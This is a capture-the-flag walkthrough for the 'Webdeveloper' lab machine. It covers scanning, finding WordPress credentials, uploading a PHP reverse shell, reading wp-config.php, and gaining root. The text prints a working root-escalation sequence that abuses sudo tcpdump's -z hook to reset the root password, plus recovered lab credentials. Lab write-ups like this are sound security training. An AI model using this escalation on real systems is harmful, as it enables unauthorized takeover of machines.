Webdeveloper
Description ⤵️
💡 A machine using the newest
REMOVED
### Server, the newest
REMOVED
### and containing some
REMOVED
## Changelog v1 - 2018/11/05 Beta - 2018/9/22
Let’s find the IP Address first »
1
IP : 192.168.56.107
Port Scan Results ➡️
1
2
3
Open Ports >
22 SSH
80 HTTP
Web Enumeration ⤵️
I checked the port 80 :
After Directory Bruteforcing we got this :
After diging in I got this finally :
1
2
3
Credentials ->
log = webdeveloper
pwd = Te5eQg&4sBS!Yr$)wf%(DcAd
Now it time to upload reverse shell code and get the shell up and running :>
With PHP reverse shell linux code I got this :
Got these credentials from wp-config.php file :
1
Password : MasterOfTheUniverse
flag.txt :
Congratulations here is youre flag:
cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290
For the root shell I changed the passwd of root to root with chpasswd command :
1
2
3
4
5
6
7
8
Command :
echo "root:root" > test.txt
COMMAND="cat /tmp/test.txt | chpasswd"
TFt=$(mktemp)
echo "$COMMAND" > $TFt
chmod +x $TFt
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TFt -Z root
Now the flag →
If you have any questions or suggestions, please leave a comment below. Thank You !
This post is licensed under CC BY 4.0 by the author.